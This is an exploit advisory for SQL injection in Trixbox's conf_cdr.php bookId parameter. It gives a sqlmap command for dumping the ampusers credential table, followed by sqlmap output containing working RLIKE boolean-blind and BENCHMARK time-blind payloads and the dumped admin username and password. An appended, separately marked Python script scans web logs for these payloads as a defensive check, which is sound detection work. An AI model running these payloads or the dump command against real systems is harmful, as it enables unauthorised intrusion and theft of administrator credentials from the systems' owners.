# Exploit Title: SQL injection in Trixbox All Versions
# Date: 13/03/2014
# Exploit Author: Sc4nX
# Email : Sec744[at]yahoo.com - r1z[at]hackermail.com
# Software Link: http://trixbox.org/downloads
# Tested on: Linux / Win 7

Example : (Grab users / password hashes from ampusers)

root@sc4nx# python sqlmap.py -u http://localhost/web-meetme/conf_cdr.php?bookId=1 -D asterisk -T ampusers -C username,password --dump --level 4 --risk 4 --no-cast --threads 10

[*] starting at 07:53:52

[07:53:52] [INFO] resuming back-end DBMS 'mysql'
[07:53:52] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: bookId
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: bookId=1' RLIKE (SELECT (CASE WHEN (2971=2971) THEN 1 ELSE 0x28 END)) AND 'AIdK'='AIdK

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: bookId=1' AND 3086=BENCHMARK(5000000,MD5(0x454a5a64)) AND 'qjLM'='qjLM
---
[07:53:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.8
web application technology: Apache 2.2.3, PHP 5.2.5
back-end DBMS: MySQL 5
[07:53:52] [INFO] fetching columns 'password, username' for table 'ampusers' in database 'asterisk'
[07:53:52] [INFO] resumed: 2
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 8
[07:53:52] [INFO] resumed: username
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 8
[07:53:52] [INFO] resumed: password
[07:53:52] [INFO] fetching entries of column(s) 'password, username' for table 'ampusers' in database 'asterisk'
[07:53:52] [INFO] fetching number of column(s) 'password, username' entries for table 'ampusers' in database 'asterisk'
[07:53:52] [INFO] resumed: 1
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 8
[07:53:52] [INFO] resumed: passw0rd
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 5
[07:53:52] [INFO] resumed: admin
[07:53:52] [INFO] analyzing table dump for possible password hashes
Database: asterisk
Table: ampusers
[1 entry]
+----------+----------+
| username | password |
+----------+----------+
| admin    | passw0rd |
+----------+----------+

===================================================================================
GZ : Dr.Hacker (Doksh) - CodeZero - All Members Sec4ever.com

The End :P
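
A defender-side check for the requests shown above, added here as an example and not part of the original advisory: it scans web-server access logs for requests to /web-meetme/conf_cdr.php whose bookId is not a plain integer, and labels the two techniques named in the sqlmap output. The Apache combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter come from the advisory; the log format is an assumption.
VULN_PATH = "/web-meetme/conf_cdr.php"
PARAM = "bookId"
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<url>\S+) HTTP/[\d.]+" \d{3}')

# Markers taken from the two payload types in the sqlmap output above.
TECHNIQUES = [
    ("boolean-based blind (RLIKE)", re.compile(r"\bRLIKE\b", re.I)),
    ("time-based blind (BENCHMARK)", re.compile(r"\bBENCHMARK\s*\(", re.I)),
]

def classify_bookid(value):
    """Return None for a plain integer id, otherwise a label for the anomaly."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    for label, pattern in TECHNIQUES:
        if pattern.search(value):
            return label
    return "non-numeric bookId"

def scan(lines):
    """Return (line number, client IP, label) for each suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["url"])
        if parts.path != VULN_PATH:
            continue
        # parse_qs percent-decodes the value, so encoded payloads are caught too.
        for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            label = classify_bookid(value)
            if label:
                findings.append((n, m["ip"], label))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Mar/2014:07:50:01 +0000] "GET /web-meetme/conf_cdr.php?bookId=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Mar/2014:07:53:52 +0000] "GET /web-meetme/conf_cdr.php?bookId=1%27%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%282971%3D2971%29%20THEN%201%20ELSE%200x28%20END%29%29%20AND%20%27AIdK%27%3D%27AIdK HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Mar/2014:07:53:53 +0000] "GET /web-meetme/conf_cdr.php?bookId=1%27%20AND%203086%3DBENCHMARK%285000000%2CMD5%280x454a5a64%29%29%20AND%20%27qjLM%27%3D%27qjLM HTTP/1.1" 200 5120',
    '192.0.2.10 - - [13/Mar/2014:07:54:00 +0000] "GET /index.php?bookId=abc HTTP/1.1" 200 300',
    '203.0.113.5 - - [13/Mar/2014:07:55:00 +0000] "GET /web-meetme/conf_cdr.php?bookId=1%27 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule on bookId is what server-side input validation for this parameter would enforce before the value reaches the query.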